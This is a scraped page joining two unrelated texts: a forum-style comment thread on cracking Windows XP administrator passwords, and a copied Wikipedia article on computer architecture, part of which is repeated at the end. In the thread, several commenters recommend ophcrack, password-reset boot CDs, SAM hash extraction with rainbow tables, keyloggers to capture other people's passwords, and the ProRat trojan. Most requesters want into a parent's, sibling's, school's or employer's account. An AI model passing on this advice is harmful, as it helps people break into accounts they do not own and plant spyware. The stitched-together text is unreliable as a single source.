Ate Tay Posted On May 08, 07
to get blocked website at school, i use myinternetisblocked.com, i know it works for youtube myspace facebook and others, not sure about these…
-post back for feedback
Matt Posted On May 10, 07
Dear sir,
If u r a hacker then you will have to know that we are restricked to create a nw folder in system32 folder with in a limted user accounts…………
Dashydude Posted On May 11, 07
AJ,
Have you heard tht u can recover a password using caculator.
not the pocket ones that we get in India,…but high quality TI calculators
i know .. it wud be gud if i let u search on it.
Master Posted On May 12, 07
You could always use orphcrack.
Sauron Posted On May 13, 07
Sorry meant ophcrack.
This way does work but not on all computers.
I used it on one computer and it worked.
But I used it to get on an account on my moms computer and access was denied.
ophcrack is an interesting program like it, but it doesn’t ALWAYS get the passwords, mainly the ones with symbols are the ones that don’t read right.
As in it won’t find the password.
But for idiots that use words like “Peaches” it works.
Sauron Posted On May 13, 07
i forgot my password and ineed to get in to my account.theres only one more account and it is limmited
Sami Posted On May 17, 07
forgot my password and ineed to get in to my account.theres only one more account and it is limmited.what do i do??????????
Sami Posted On May 17, 07
You should be able to use this method on a limited account, if not check out,http://ophcrack.sourceforge.net/
Sauron Posted On May 17, 07
does anyone know how to get onto facebook from school when its blocked?
Kendra Posted On May 18, 07
what about limited accounts ? what about if i can not boot from anything ? what soft can i use to find, not to crack, the admin pass ? the bios is pass protected!
Marry Posted On May 26, 07
me and my wife are seperated i am listed as the owner on the computer windows xp home but before she left she set her self up as admin how do i change this its driving me nuts i cant do shit
Dale Posted On Jun 07, 07
i tried the one listed at the top of the page but when i get to a certain line it says access denied why?
Dale Posted On Jun 07, 07
my brother make my account as limited account but he has himself an administrator account is there is any way to hack his password or to make again my account as administrator
Abdullah Posted On Jun 10, 07
So this technique doesnt work at the particular school I attend. Dos says something about to many parameters to fill. And the file not actually existing.
Kal Posted On Jun 14, 07
well, it didt work.
Cab_Axial Posted On Jun 24, 07
the Windows XP Privilege Escalation Exploit way sounds abit confusing to me actually it sounds like shit,
try ERD Commander 2005 v5.0 BOOT CD its very easy to use you can download this file from ares p2p thats where I got my file from and oh yes youll need a iso burner to make your boot cd once youve burnt your boot cd all you have to do us reboot your machine erd commander boots up into a windows like state interface all you need to do then is use the wizard in start thats it within seconds you will reset your admin password no copy and pasting writing scripts or dos command changing or what ever shit even a kid can use this tool thats how simple it is.
Monkeysee Posted On Jun 26, 07
this guy who subitted this thread starter sounds like an idiot he doesn’t even respond to any of these follow up questions it kinda makes me think that hes copied and pasted this post off another site or what ever and doesn’t even know how to use his bullshit program that hes recommended I cant stand these kinds of idiots
Monkeysee Posted On Jun 26, 07
@monkeysee:
…try ERD Commander 2005 v5.0 BOOT CD its …
1. For your ERD Boot CD, you need to have a CD drive on the system. This is not always the case, especially in offices.
…sounds like an idiot he doesn’t even respond to any of these follow up questions …
2. You never RAISED any questions which needed to be answered. So DON’T flame. Be a nice guy when you enter someone’s house.
…copied and pasted this post off another site…
3. Read things properly (a) to know that he’s mentioned the sites from which he’s used the data, (b) to avoid any CONFUSION in understanding simple lines in english.
4. I don’t really like to do this but next time you wish to suggest your skript kiddi3 thingy, please leave a link to your url. I don’t really prefer anonymous flames.
5. What Arpit has written is meant for a BEGINNER level audience. Now again, if you wish to see something really really in action, you might want to read the SAM file by writing your own code (no Cain, Ophcrack etc.), get the hashes, and crack them using Rainbow tables… Oh! wait. You might want to code your own Rainbow table generator. :)
Bipin 3~ Upadhyay Posted On Jun 27, 07
this is really apeared to be a nice trick.
i will definatly try it.
as an cyber security expert it may going to help me lot.
Jitendra Ukhardu Chavhan Posted On Jul 05, 07
Thx for all the info m8 but i’ve got 1 problem. My dad is the computer administrator and i’ve made a bet with him that i could crack his user account. I can access a limited account but when i tried the command promt thing (*first instructions) it didnt let me create the folder. Pls help me i really need help!
Eriko Posted On Jul 15, 07
@Eriko:
Suggestion: Try using a keylogger.
Advice:
1. Do no follow the suggestion given above. It might pi** him off.
2. Never mess with parents and females.
Bipin 3~ Upadhyay Posted On Jul 16, 07
everythings fine but i just cant open system 32 from dos in my limited account
San Posted On Jul 18, 07
i have a problem in login windows xp
some one change my administrator password to login windows xp . i have a difficulty to enter windows xp
now how can i enter in windows xp please help me.
thanks
Suresh Panchal Posted On Jul 24, 07
I want a particular password which I can enter any Windows Xp
Adil Posted On Jul 27, 07
good information i tried to go through but i am always faced with thus
a duplicated name exit or file cannot be found… what should be the first thing i should do ?
thanks looking forward on your usual assistance
Bingi Man Posted On Jul 29, 07
this guy wrote this for begginners and it’s quite good, if your advanced then try booting the computer with something that will give you access to the hard disks, like Puppy or Austrumi or even DOS and extract the sam file to a convenient location, then crack the SAM with LCP or something, extract the hash and rainbow it
Mini Posted On Jul 30, 07
this process is successful
Jitendra Posted On Aug 31, 07
Hey kids want to now how to get on your limited account with time restrictions well listen up before you log on unplug the network cable and then log on then plug the network cable back in That easy!
Corey Posted On Sep 01, 07
Do anybody know how to hack any computer, lol i want to know, i f you know how to hack a computer from far away send an email to mikej941126@hotmail.com If you know send it quick, i will send you a thank you note and i will add you at my email
Themajestic Posted On Sep 02, 07
Ok please no more noobs call getting on to a website through a proxy call it hacking, and please read the methods at the top before just posting things like “how do I get the admin password?”.
Anyone having genuine problems I can recommend Ophcrack as most people, schools etc do not bother to set up a bios password which will allow you to set the CD as the default boot device by pressing F2/F12/DEL at startup to get into the bios menu. Once you have done this it usually takes about 10-15 minutes to boot up and get the password.
This is a particularly easy and clean method of getting the admin password and I recommend it to anyone, especially noobs as it has a GUI.
Bob Posted On Sep 03, 07
The only thing that comes on the monitor is the password request. Cannot go anywhere else……. don’t know the password though…… what do i do? All these instructions don’t help me….. cause i can’t even get past the password request……….what should i do?
Evey Posted On Sep 04, 07
Get on a website @ school by opening CMD then typing “ping sitenamehere” (eg. “ping bebo.com” minus quotations) Then type the IP address into an internet browser after “http://”
Pat Posted On Sep 13, 07
FRIKIN PIMP
Uriel Carbajal Posted On Sep 14, 07
anyone knows how to crack passwords in a network system?
ophcrack can only crack some passwords on the computer…
PandaWarlord@Hotmail.Com Posted On Sep 18, 07
I’m the Systems Administrator at our school, but sometimes the head admin changes the passwords and doesn’t give them to us. I have had the most success with keyloggers. they seem to always work.
And yes! I know you cant install things on a school computer with a limited account. BUT! you can install it on a Flash drive or External Hard disk. do it at home that way if it needs special file permissions it will be able to access them. then bring that said drive to school plug it in and boot the keylogger. a good one will run in the background and usually wont be found by an antivius program.
convince them to type the password for some reason… I said I needed to install drivers for my camera. and the log got it right away!!
Have fun! and don’t get caught!!
Uber@HAXoR
Uber@HAXoR Posted On Sep 23, 07
please send me idea to hack password of administrator of computer with xp
Cool Posted On Sep 24, 07
How can I get or crack Administrative rights as I am on a office network. We have no rights at all, cant instal or unistal. please help. is there any that i can get or crack network administrator rights or password. thanks
Thorn Posted On Sep 25, 07
mmm, this does not work for me on my latest PC. windows.system32 is not writable.
Works fine on old pc though.
Denied Posted On Sep 29, 07
forgot to ask: does any one now how to:
backup the password file,
replace it with a password file which has a known admin password
then you can do whatever you like
then restored the old one
Denied Posted On Sep 29, 07
You can access one of the proxy sites I made at school, just dont let anyone see you doing it and you have a way to get around school blocking software for life. goto
http://66.212.18.5/portal/browse.php
you will be able to goto myspace and other sites just type the url in were myspace.com is and click go.
Hackmaster Posted On Oct 22, 07
If anyone is intrested in a personal hacker email me at internet_legal_services@hotmail.com
First hack is free, a 12 month membership of hacks is 30 us dollars.
Also with 12 month membership downloadable viruses.
Hackmaster Posted On Oct 22, 07
Is the link (http://www.d–b.webpark.pl/dreampackpl_en.htm) bad? I used Firefox and IE but there were errors on both browsers. Can anyone send me the .iso image please…?
PandaWarlord@Hotmail.Com Posted On Oct 23, 07
To Hack Into Bebo,Myspace And Etc Go To Google And Out In gpass1.com/proxy
Trevonte Posted On Oct 30, 07
please send me idea to hack password of administrator of computer with xp when my account is limited
Wcr Posted On Nov 03, 07
how to get windows xp password file while my account is limited
Wcr Posted On Nov 03, 07
can u tell me some what clear to do it..!
Kar Posted On Nov 06, 07
didnt work it said access denied
Raj Posted On Nov 08, 07
in how to hack password on number 8 the computer denys the access what should i do
Kaya Posted On Nov 12, 07
I have a system and i havn’t xp cd now and i forgot my administrator password or user account password,can i againg access my system without format my system ? I’m waiting for your answer.
Dharm Posted On Nov 13, 07
Easy.A dumb Admin. kept Banning me so i gave him a good hacking
Yoshitsune Asakura Posted On Nov 16, 07
Hey,i tried to hack again,but the computer said that ”the syntax of the command is incorrect”and it also said”duplicate file exists or has been copied’’someone please reply and explain to me what I did wrong.thank you.
Yoshitsune Asakura Posted On Nov 16, 07
i began hacking again,but the computer said”the syntax of the command is incorrect’’some one please post back and explain what i did wrong cuz this never happened before.
Yoshitsune Asakura Posted On Nov 16, 07
so complicated…heres the easiest way..goto run, type cmd, type net users administrator then press enter, enter now any password you want
Bill Posted On Nov 20, 07
i forgot, after administrator type * and thats all
Bill Posted On Nov 21, 07
bill, this only works if you already have administrative rights.(which really defeats the purpose of doing it since you already have admin access.)
Pandawarlord@Hotmail.Com Posted On Nov 22, 07
thats true pandawatord…. but if youre running as guest or without admin prive… you donot have administrative rights to create directory such as “temphack” or any other, You cant do hacking afterall unless you’ll pull it out the HDD. the purpose of this is if you donot know the password of administrator or any user of the PC.
If you are one of the users with administrative rights, you can do this or to any other users. I hope, I shared something
Bill Posted On Nov 23, 07
Whoever wrote the explanation for this doesn’t know a damn thing about cmd. MKDIR or MD are commands that create folders. *Sigh* I knew that when I was like 10 years old…
Not Telling Posted On Dec 04, 07
how to crack time ristriction on computer at cybercafe
Umesh Posted On Dec 26, 07
This does not work for me, I assume it’s becuase a .scr file isn’t loaded like an exe ??? I’ve tried command.com too which seems like the right one to use if this were going to work, maybe I just like trying to sound smart.
DerreK Posted On Jan 04, 08
Hello, i am no expert but until i recently converted to OSX i have been a long term windows user. As for accessing a standalone NT based windows machine (i.e. NT, 2000, XP, VISTA) you use the login command prompt method. In my personal opinion if you are not savvy enough to know the workaround for the NTFS file security then you should not even attempt to “hack” these computers.
As for the banned websites, the chances are that your internet settings are configured to run through a ISA server, most of which are PROXY based. In this case i would recommend using a WMI or VBS script that delegates system level control and changes the setting therefore bypassing the GPO that enforced it. Also for those that are aware there are various group policy enumeration exploits that can be initiated from a client machine.
I will warn anybody that reads this, that using any of the above techniques without written permission is a breach of the various computer security laws and data protection acts. I was caught for using unauthorised scripts and GPO exploits my by previous school, i very closely escaped a criminal record. I am 16.
Happy Hacking
n00bs
Jack Hunt Posted On Jan 05, 08
This is a very good hack I actually used it sometime back for personal gain but, about the blocked websites in schools you can just find proxy servers around the Internet just as useful as what Mr.Hunt had to say.
Jeff Posted On Jan 07, 08
i need help my uncle set our computer up and i dont have downloading privliges and he set up to admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08
i need help my uncle set our computer up and i dont have downloading privliges and he set up two admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08
sorry to be so buggy. but i have another issue, internet explorer 7 was installed on my computer and now when i try to go to certain sites it most of the time wont let me on and if it does it looks all white with blue border like my myspace my aol email etc… i really need help plzzz get back to me asap.
Aboyinneed Posted On Jan 08, 08
i wanna knw abt how can i get Proxies..which is uses in Yahoo id Cracker??Waiting for ya Reply..Tyvm
John Posted On Jan 10, 08
does this method delete the current password or just bypass it? kuz i dont want anyone to find out i logged on. thanks
Andy Posted On Jan 13, 08
If you want an application that bypasses all passwords, download “windows key” or “jtr”. Win Commander is also good. All you have to do with these applications is boot them as an ISO from cd and it will delete all password hashes from the system…. there is no way to extract a password as that would take months using a brute force attack.
TO ALL!!!! Posted On Jan 16, 08
i want to change pirated window xp into valid window xp
what to do Plz help me
Raghav Posted On Jan 20, 08
YOU ALL ARE NOOBS, IF YOU ACTUALLY KNOW ANYTHING ABOUT COMPUTERS YOU CAN USE THE FIRST METHOD EXPLAINED, FIRST TO THE ONE TRUE IDIOT I SAW “SYSTEM 32″ DOESNT HAVE A SPACE “SYSTEM32″ IF CMD.EXE DOESNT WORK USE COMMAND.COM, IF THE COMPUTER IS ON A NETWORK WHEN YOU ENTER YOUR LOGIN INFO… UNPLUG THE ETHERNET CORD AS SOON AS IT STARTS LOADING, USUALLY GIVES YOU ADMIN RIGHTS,
PEACE OUT BITCHES!
MastRHakeR Posted On Feb 11, 08
O.K newbies if you need to crack a fucking password i suggest you get a program called ProRat(there are many versions, each works slightly diff. and has diff features)burn it onto a cd/ get on your computer limited access.if your having trouble downloading do it a friends house and jus save prorat to cd… download the prorat client/your anti-virus will go off,. just download it anyway. pay attention to the filename youll need to delete it manually later)after you download the client on your computer/ open the prorat program., this program is much like a trojan in the fact that you can do alot more than just get passwords but for efforts sake we will go with this. scroll in the program and look for the “get passwords” this feature tells the client/intruder to look in your computers system files and retrieve the pass words which displays them from pro rat to you.,. after you have retrieved your passwords. go to start/ click search/ then search for the client file you downloaded and delete it., the restart your computer with the passwords in hand,. PRORAT is just one great way of cracking/hacking., the tutorials on this site are very well written and very precise,., I love educational information..-I.T HONORS STUDENT
p.s you will get prorat off of ares or bit-torrent(BE CAREFUL WHEN SEARCHING FOR THESE KINDS OF PROGRAMS THATS HOW PEOPLE LIKE ME GET YOU NEWBIES)
ITPRO Posted On Feb 23, 08
when all else fails join the crowd., this is how to keep from being hacked.,., Never give out personal info to anyone., emails are a dime a dozen and are merely unimportant if you dont use the internet for business so if your a casual user and dont bank or buy online. a hacked email is a hacked email find another provider and be even more careful., never ever let people play with your computer they are too expensive to be treated like toys or for your buddy jonny to be downloading a cool jam and at the same time downloading a file that has been tagged with a client that allows me to see everything you will do simply by clicking “YES” when your comp. prompts “ARE YOU SURE YOU WANT TO DOWNLOAD”. IF a fle looks suspicious dont download it. Example REAL CRACKED APP.
Photoshopcs3……545mb
Photoshopcs3……612mb
Photoshopcs3……589mb
Examples of fakes..(TYPICALLY APPLIES FOR ALL)
Photoshopcs3……121 kb
Photoshopcs3……1029 kb
photoshopcs3……2.2 mb
fake program files are how most hackers invade your box.,. Hackers arent stupid and hacking is illegal no real hacker is ever going to admit it. Its a lowly job but someone has to do it haha., lets keep it moving if you bank or buy online and it reqires credit or social sec #’s make sure you are over a secure connection., in most cases even if you are infected with a virus spyware etc the information you send through a secure server wiill be encrypted and decrypted later by the people who recieve your info., moving on PASSWORDS,. there are people everyday that wake up and say HAh! i want to hack a password., get online with thier fancy lil programs and start playing away.,. lemme show you how to stop that shit right now., most coders not all but most will make passwords crackers based off of dictionaries so a passwrod like “holydiver” would be an easy hack as opposed to a password of “canyon1″.,always add number or txt your self like i had a password that won me a lil competition in school NO ONE CRACKED IT and all it was ” I wnT 2 C You try” the password included 5 spaces a number and only 2 recognisable words., it wouldnt have been worth thier precious time to fool with it. they will give up and go on.
Every now and the you have the occasional hard ass that thinks he is the man with a computer and will figure out some way to hack and mess your stuff up.,. remember its alot easier to replace information but not replacing a computer or repair bills.,. simply re-format your computer if you think there is something major wrong with it.,., that being said i am done preaching…I.T HONORS STUDENT
ITPRO Posted On Feb 23, 08
tell me how to edit system32 in limited account.and tell me what means “hash”
Dil Posted On Feb 27, 08
The system cannot find logon.scr
STFU!!!
JW Posted On Mar 21, 08
Try using the safemode administrator to gain acess to the permnissions of the user accounts on the PC. ive fixed 2 computers this way.
Sinphas Posted On Mar 27, 08
I have tried this and i am not able to get the system32 part to work i have limited priveledges so i think that is reason feed back plz
Tom Posted On Apr 11, 08
Trackbacks/Pingbacks
Scribez How to Hack a Window XP Administrator Password «
RSS Newsletter
Arpit Jacob's Twitter ID\m/ RT @rishi Hey Arpit. Just dropped by to say that you've done awesome work with ZetaLight. The portal looks just too awesome. Congrats!
Get A Free Ad SpotAd Spot Available
Related posts
Recover Lost Forgotten Windows XP Administrator Password
Windows 7 Activation Key Crack By Hackers, Chew WGA & RemoveWGA
Myspace Hack : Profile Url And MySpace Email
How To Hack Myspace Private Profile Picture And Video
Windows Live Suite All Live Products In One?
Tags
Analytics Apple Blogging Download FireFox Free General Google Hacking How To Internet iPhone Mac OSX Microsoft Open Source Photos Plugins Programming Security Social-Networks Software Statistics Templates Themes Tips Tutorial Videos Web 2.0 Web-Design Web-Development Web-Hosting Web-Standards Windows Wordpress
Designed by Arpit Jacob | © Copyright | Disclaimer | Contact Contact Arpit Jacob Arpit Jacob On Facebook Arpit Jacob On Twitter Arpit Jacob On Google
';
Thursday, March 11, 2010
Computer Achitecture
Computer architecture
From Wikipedia, the free encyclopedia
It is requested that a diagram or diagrams be included in this article to improve its quality.
For more information, refer to discussion on this page and/or the listing at Wikipedia:Requested images.
In computer science, computer architecture or digital computer organization is the conceptual design and fundamental operational structure of a computer system. It is a blueprint and functional description of requirements and design implementations for the various parts of a computer, focusing largely on the way by which the central processing unit (CPU) performs internally and accesses addresses in memory.
It may also be defined as the science and art of selecting and interconnecting hardware components to create computers that meet functional, performance and cost goals.
Computer architecture comprises at least three main subcategories:[1]
Instruction set architecture, or ISA, is the abstract image of a computing system that is seen by a machine language (or assembly language) programmer, including the instruction set, word size, memory address modes, processor registers, and address and data formats.
Microarchitecture, also known as Computer organization is a lower level, more concrete and detailed, description of the system that involves how the constituent parts of the system are interconnected and how they interoperate in order to implement the ISA.[2] The size of a computer's cache for instance, is an organizational issue that generally has nothing to do with the ISA.
System Design which includes all of the other hardware components within a computing system such as:
System interconnects such as computer buses and switches
Memory controllers and hierarchies
CPU off-load mechanisms such as direct memory access (DMA)
Issues like multiprocessing.
Once both ISA and microarchitecture have been specified, the actual device needs to be designed into hardware. This design process is called implementation. Implementation is usually not considered architectural definition, but rather hardware design engineering.
Implementation can be further broken down into three (not fully distinct) pieces:
Logic Implementation — design of blocks defined in the microarchitecture at (primarily) the register-transfer and gate levels.
Circuit Implementation — transistor-level design of basic elements (gates, multiplexers, latches etc) as well as of some larger blocks (ALUs, caches etc) that may be implemented at this level, or even (partly) at the physical level, for performance reasons.
Physical Implementation — physical circuits are drawn out, the different circuit components are placed in a chip floorplan or on a board and the wires connecting them are routed.
For CPUs, the entire implementation process is often called CPU design.
More specific usages of the term include more general wider-scale hardware architectures, such as cluster computing and Non-Uniform Memory Access (NUMA) architectures.
Contents [hide]
1 History
2 Computer architectures
3 Computer architecture topics
3.1 Sub-definitions
3.2 The Role Of Computer Architecture
3.2.1 Computer Architecture: The Definition
3.2.2 Instruction Set Architecture
3.2.3 Computer Organization
3.3 Design goals
3.4 Performance
3.5 Power consumption
4 See also
5 Notes
6 References
7 External links
[edit]History
The term “architecture” in computer literature can be traced to the work of Lyle R. Johnson and Frederick P. Brooks, Jr., members in 1959 of the Machine Organization department in IBM’s main research center. Johnson had the opportunity to write a proprietary research communication about Stretch, an IBM-developed supercomputer for Los Alamos Scientific Laboratory. In attempting to characterize his chosen level of detail for discussing the luxuriously embellished computer, he noted that his description of formats, instruction types, hardware parameters, and speed enhancements was at the level of “system architecture” – a term that seemed more useful than “machine organization”. Subsequently, Brooks, one of the Stretch designers, started Chapter 2 of a book (Planning a Computer System: Project Stretch, ed. W. Buchholz, 1962) by writing, “Computer architecture, like other architecture, is the art of determining the needs of the user of a structure and then designing to meet those needs as effectively as possible within economic and technological constraints”. Brooks went on to play a major role in the development of the IBM System/360 line of computers, where “architecture” gained currency as a noun with the definition “what the user needs to know”. Later the computer world would employ the term in many less-explicit ways.
The first mention of the term architecture in the referred computer literature is in a 1964 article describing the IBM System/360.[3] The article defines architecture as the set of “attributes of a system as seen by the programmer, i.e., the conceptual structure and functional behavior, as distinct from the organization of the data flow and controls, the logical design, and the physical implementation”. In the definition, the programmer perspective of the computer’s functional behavior is key. The conceptual structure part of an architecture description makes the functional behavior comprehensible, and extrapolatable to a range of Use cases. Only later on did ‘internals’ such as “the way by which the CPU performs internally and accesses addresses in memory,” mentioned above, slip into the definition of computer architecture.
[edit]Computer architectures
There are many types of computer architectures:
Quantum computer vs Chemical computer
Scalar processor vs Vector processor
Non-Uniform Memory Access (NUMA) computers
Register machine vs Stack machine
Harvard architecture vs von Neumann architecture
Cellular architecture
The quantum computer architecture holds the most promise to revolutionize computing.[4]
[edit]Computer architecture topics
[edit]Sub-definitions
Some practitioners of computer architecture at companies such as Intel and AMD use more fine distinctions:
Macroarchitecture — architectural layers that are more abstract than microarchitecture, e.g. ISA
Instruction Set Architecture (ISA) — as defined above
Assembly ISA — a smart assembler may convert an abstract assembly language common to a group of machines into slightly different machine language for different implementations
Programmer Visible Macroarchitecture — higher level language tools such as compilers may define a consistent interface or contract to programmers using them, abstracting differences between underlying ISA, UISA, and microarchitectures. E.g. the C, C++, or Java standards define different Programmer Visible Macroarchitecture — although in practice the C microarchitecture for a particular computer includes
UISA (Microcode Instruction Set Architecture) — a family of machines with different hardware level microarchitectures may share a common microcode architecture, and hence a UISA.
Pin Architecture — the set of functions that a microprocessor is expected to provide, from the point of view of a hardware platform. E.g. the x86 A20M, FERR/IGNNE or FLUSH pins, and the messages that the processor is expected to emit after completing a cache invalidation so that external caches can be invalidated. Pin architecture functions are more flexible than ISA functions - external hardware can adapt to changing encodings, or changing from a pin to a message - but the functions are expected to be provided in successive implementations even if the manner of encoding them changes.
[edit]The Role Of Computer Architecture
[edit]Computer Architecture: The Definition
The coordination of abstract levels of a processor under changing forces, involving design, measurement and evaluation.it also include the overall fundamental working principle of the internal logical structure of a computer system.
[edit]Instruction Set Architecture
The ISA is the interface between the software and hardware. It is the set of instructions that bridges the gap between high level languages and the hardware. For a processor to understand a command, it should be in binary. The ISA encodes these values.
The ISA also defines the items in the computer that are available to a programmer. For example, it defines data types, registers, addressing modes, memory organization etc. Registers are high speed storage for numbers that can be accessed by a processor. Data as well as instructions can be in a register.
Addressing modes are the way that an instruction locates its operands.
Memory organization defines how instructions interact with the memory.
[edit]Computer Organization
Computer organization helps optimize performance-based products. For example, software engineers need to know the processing ability of processors. They may need to optimize software in order to gain the most performance at the least expense. This can require quite detailed analysis of the computer organization. For example, in a multimedia decoder, the designers might need to arrange for most data to be processed in the fastest data path.
Computer organization also helps plan the selection of a processor for a particular project. Multimedia projects may need very rapid data access, while supervisory software may need fast interrupts.
Sometimes certain tasks need additional components as well. For example, a computer capable of virtualization needs virtual memory hardware so that the memory of different simulated computers can be kept separated.
The computer organization and features also affect the power consumption and the cost of the processor.
[edit]Design goals
The exact form of a computer system depends on the constraints and goals for which it was optimized. Computer architectures usually trade off standards, cost, memory capacity, latency and throughput. Sometimes other considerations, such as features, size, weight, reliability, expandability and power consumption are factors as well.
The most common scheme carefully chooses the bottleneck that most reduces the computer's speed. Ideally, the cost is allocated proportionally to assure that the data rate is nearly the same for all parts of the computer, with the most costly part being the slowest. This is how skillful commercial integrators optimize personal computers.
[edit]Performance
Computer performance is often described in terms of clock speed (usually in MHz or GHz). This refers to the cycles per second of the main clock of the CPU. However, this metric is somewhat misleading, as a machine with a higher clock rate may not necessarily have higher performance. As a result manufacturers have moved away from clock speed as a measure of performance.
Computer performance can also be measured with the amount of cache a processor has. If the speed, MHz or GHz, were to be a car then the cache is like the gas tank. No matter how fast the car goes, it will still need to get gas. The higher the speed, and the greater the cache, the faster a processor runs.[dubious – discuss]
Modern CPUs can execute multiple instructions per clock cycle, which dramatically speeds up a program. Other factors influence speed, such as the mix of functional units, bus speeds, available memory, and the type and order of instructions in the programs being run.
There are two main types of speed, latency and throughput. Latency is the time between the start of a process and its completion. Throughput is the amount of work done per unit time. Interrupt latency is the guaranteed maximum response time of the system to an electronic event (e.g. when the disk drive finishes moving some data). Performance is affected by a very wide range of design choices — for example, pipelining a processor usually makes latency worse (slower) but makes throughput better. Computers that control machinery usually need low interrupt latencies. These computers operate in a real-time environment and fail if an operation is not completed in a specified amount of time. For example, computer-controlled anti-lock brakes must begin braking almost immediately after they have been instructed to brake.
The performance of a computer can be measured using other metrics, depending upon its application domain. A system may be CPU bound (as in numerical calculation), I/O bound (as in a webserving application) or memory bound (as in video editing). Power consumption has become important in servers and portable devices like laptops.
Benchmarking tries to take all these factors into account by measuring the time a computer takes to run through a series of test programs. Although benchmarking shows strengths, it may not help one to choose a computer. Often the measured machines split on different measures. For example, one system might handle scientific applications quickly, while another might play popular video games more smoothly. Furthermore, designers have been known to add special features to their products, whether in hardware or software, which permit a specific benchmark to execute quickly but which do not offer similar advantages to other, more general tasks.
[edit]Power consumption
Main article: low-power electronics
Power consumption is another design criterion that factors in the design of modern computers. Power efficiency can often be traded for performance or cost benefits. With the increasing power density of modern circuits as the number of transistors per chip scales (Moore's law), power efficiency has increased in importance. Recent processor designs such as the Intel Core 2 put more emphasis on increasing power efficiency. Also, in the world of embedded computing, power efficiency has long been and remains the primary design goal next to performance.
[edit]See also
Computer science portal
Computer hardware
CPU design
Orthogonal instruction set
Software architecture
Computer organization
von Neumann architecture
Influence of the IBM-PC on the personal computer market
[edit]Notes
John L. Hennessy and David Patterson (2006). Computer Architecture: A Quantitative Approach (Fourth Edition ed.). Morgan Kaufmann. ISBN 978-0-12-370490-0.
Barton, Robert S., "Functional Design of Computers", Communications of the ACM 4(9): 405 (1961).
Barton, Robert S., "A New Approach to the Functional Design of a Digital Computer", Proceedings of the Western Joint Computer Conference, May 1961, pp.393-396. About the design of the Burroughs B5000 computer.
Bell, C. Gordon; and Newell, Allen (1971). "Computer Structures: Readings and Examples", McGraw-Hill.
Blaauw, G.A., and Brooks, F.P., Jr., "The Structure of System/360, Part I-Outline of the Logical Structure", IBM Systems Journal, vol. 3, no. 2, pp. 119-135, 1964.
Tanenbaum, Andrew S. (1979). Structured Computer Organization. Englewood Cliffs, New Jersey: Prentice-Hall. ISBN 0-13-148521-0.
[edit]References
This article needs additional citations for verification.
Please help improve this article by adding reliable references. Unsourced material may be challenged and removed. (November 2008)
^ John L. Hennessy and David A. Patterson. Computer Architecture: A Quantitative Approach (Third Edition ed.). Morgan Kaufmann Publishers.
^ Laplante, Phillip A. (2001). Dictionary of Computer Science, Engineering, and Technology. CRC Press. pp. 94-95. ISBN 0849326915.
^ Amdahl, G.M.; Blaauw, G.A.; and Brooks, F.P., Jr., Architecture of the IBM System/360, IBM Journal of Research and Development, April 1964
^ "Computer architecture: fundamentals and principles of computer design" by Joseph D. Dumas 2006. page 340.
[edit]External links
This article's use of external links may not follow Wikipedia's policies or guidelines. Please improve this article by removing excessive and inappropriate external links or by converting links into references. (January 2010)
ISCA: Proceedings of the International Symposium on Computer Architecture
Micro: IEEE/ACM International Symposium on Microarchitecture
HPCA: International Symposium on High Performance Computer Architecture
ASPLOS: International Conference on Architectural Support for Programming Languages and Operating Systems
ACM Transactions on Computer Systems
IEEE Computer Society
http://www.cs.wisc.edu/~arch/www
http://www.cs.wisc.edu/arch/www/people.html
http://www.codeproject.com/useritems/System_Design.asp - This approach allows beginners to easily break and design complex software systems.
Technical University of Catalonia, Department of Computer Architecture
The von Neumann Architecture of Computer Systems
[hide]
v • d • e
Digital systems
Components
Logic gate · Digital circuit · Integrated circuit (IC)
Theory
Boolean logic · Digital signal processing · Computer architecture
Applications
Digital audio · Digital photography · Digital video
Categories: Wikipedia requested diagram images | Computer architecture | Central processing unit
article discussion edit this page history
Try Beta Log in / create account
navigation
Main page
Contents
Featured content
Current events
Random article
search
interaction
About Wikipedia
Community portal
Recent changes
Contact Wikipedia
Donate to Wikipedia
Help
toolbox
What links here
Related changes
Upload file
Special pages
Printable version
Permanent link
Cite this page
languages
العربية
বাংলা
Bosanski
Български
Català
Deutsch
Español
Euskara
فارسی
Français
한국어
Hrvatski
Bahasa Indonesia
Italiano
Latviešu
Magyar
Bahasa Melayu
Nederlands
日本語
Polski
Português
Русский
Simple English
Slovenčina
Suomi
Svenska
தமிழ்
ไทย
Türkçe
Українська
Tiếng Việt
中文
This page was last modified on 7 March 2010 at 23:42.
Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply. See Terms of Use for details.
Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc., a non-profit organization.
Contact us Privacy policy About Wikipedia Disclaimers
From Wikipedia, the free encyclopedia
It is requested that a diagram or diagrams be included in this article to improve its quality.
For more information, refer to discussion on this page and/or the listing at Wikipedia:Requested images.
In computer science, computer architecture or digital computer organization is the conceptual design and fundamental operational structure of a computer system. It is a blueprint and functional description of requirements and design implementations for the various parts of a computer, focusing largely on the way by which the central processing unit (CPU) performs internally and accesses addresses in memory.
It may also be defined as the science and art of selecting and interconnecting hardware components to create computers that meet functional, performance and cost goals.
Computer architecture comprises at least three main subcategories:[1]
Instruction set architecture, or ISA, is the abstract image of a computing system that is seen by a machine language (or assembly language) programmer, including the instruction set, word size, memory address modes, processor registers, and address and data formats.
Microarchitecture, also known as Computer organization is a lower level, more concrete and detailed, description of the system that involves how the constituent parts of the system are interconnected and how they interoperate in order to implement the ISA.[2] The size of a computer's cache for instance, is an organizational issue that generally has nothing to do with the ISA.
System Design which includes all of the other hardware components within a computing system such as:
System interconnects such as computer buses and switches
Memory controllers and hierarchies
CPU off-load mechanisms such as direct memory access (DMA)
Issues like multiprocessing.
Once both ISA and microarchitecture have been specified, the actual device needs to be designed into hardware. This design process is called implementation. Implementation is usually not considered architectural definition, but rather hardware design engineering.
Implementation can be further broken down into three (not fully distinct) pieces:
Logic Implementation — design of blocks defined in the microarchitecture at (primarily) the register-transfer and gate levels.
Circuit Implementation — transistor-level design of basic elements (gates, multiplexers, latches etc) as well as of some larger blocks (ALUs, caches etc) that may be implemented at this level, or even (partly) at the physical level, for performance reasons.
Physical Implementation — physical circuits are drawn out, the different circuit components are placed in a chip floorplan or on a board and the wires connecting them are routed.
For CPUs, the entire implementation process is often called CPU design.
